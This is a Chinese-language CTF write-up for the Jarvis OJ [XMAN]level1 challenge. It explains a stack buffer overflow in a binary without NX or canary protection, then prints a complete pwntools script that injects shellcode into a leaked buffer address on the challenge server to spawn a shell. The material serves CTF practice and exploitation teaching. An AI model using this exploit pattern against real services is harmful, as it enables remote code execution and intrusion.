Jarvis OJ - [XMAN]level1 - Writeup

M4x原創，轉載請表明出處http://www.cnblogs.com/WangAoBo/p/7594173.html

題目：

分析

• checksec檢查保護機制如下，NX沒開，可以通過執行shellcode來get shell

  

• 拖到IDA中，查看函數的流程，vulnerable_function函數打印了緩沖區的起始地址，read可以讀取0x100個字符，而buf到ret的偏移為0x88 + 0x4 < 0x100，而該elf又是No canary found。

  

  ?

  

• 整理一下現有的信息：

  • 長度為0x100的緩沖區
  • 緩沖區的起始地址
  • 沒有打開棧保護和NX保護

  因此，可以把shellcode填到以buf為起始地址的緩沖區裏，並控制vulnerable_function返回到shellcode，就可以通過執行shellcode拿到shell

• ?

步驟

• 經過如上分析，寫出exp如下：

 1 #!/usr/bin/env python
 2 # -*- coding: utf-8 -*-
 3 __Auther__ = ‘M4x‘
 4 
 5 from pwn import *
 6 context(log_level = ‘debug‘, arch = ‘i386‘, os = ‘linux‘)
 7 
 8
 
 shellcode = asm(shellcraft.sh())
 9 #  io = process(‘./level1‘)
10 io = remote(‘pwn2.jarvisoj.com‘, 9877)
11 text = io.recvline()[14: -2]
12 #  print text[14:-2]
13 buf_addr = int(text, 16)
14 
15 payload = shellcode + ‘\x90‘ * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
16 io.send(payload)
17 io.interactive()
 
18 io.close()

運行exp，拿到flag

Jarvis OJ - [XMAN]level1 - Writeup